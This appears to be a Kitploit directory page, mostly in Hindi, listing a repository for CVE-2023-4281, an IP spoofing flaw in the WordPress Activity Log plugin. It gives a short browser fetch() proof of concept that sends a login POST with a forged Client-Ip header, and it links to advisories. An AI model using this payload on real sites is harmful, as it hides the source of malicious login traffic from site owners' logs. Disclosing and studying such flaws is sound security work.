Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-4281 — CVE-2023-4281 भेद्यता के लिए रिपॉजिटरी। | Kitploit
उपकरण/GitHubGitHub/b0marek/cve-2023-4281
भेद्यता विश्लेषणआईडीएस/आईपीएस से बचनापहचान छुपाने के उपकरणजानकारी एकत्र करनावेब सुरक्षा
GitHubb0marek/cve-2023-4281

CVE-2023-4281

CVE-2023-4281 भेद्यता के लिए रिपॉजिटरी।

रिपॉजिटरी देखें
213 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE आईडी: CVE-2023-4281

भेद्यता प्रकार: IP पता स्पूफिंग

विवरण: Activity Log प्लगइन संभावित अविश्वसनीय हेडर से क्लाइंट IP पते प्राप्त करता है, जिससे हमलावर इसके मान में हेरफेर कर सकता है। इसका उपयोग दुर्भावनापूर्ण ट्रैफ़िक के स्रोत को छिपाने के लिए किया जा सकता है।

पुनरुत्पादन के चरण:

Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

संदर्भ:

  1. https://wpscan.com/vulnerability/f5ea6c8a-6b07-4263-a1be-dd033f078d49
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4281
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aryo-activity-log/activity-log-287-ip-address-spoofing
टूल डाउनलोड करें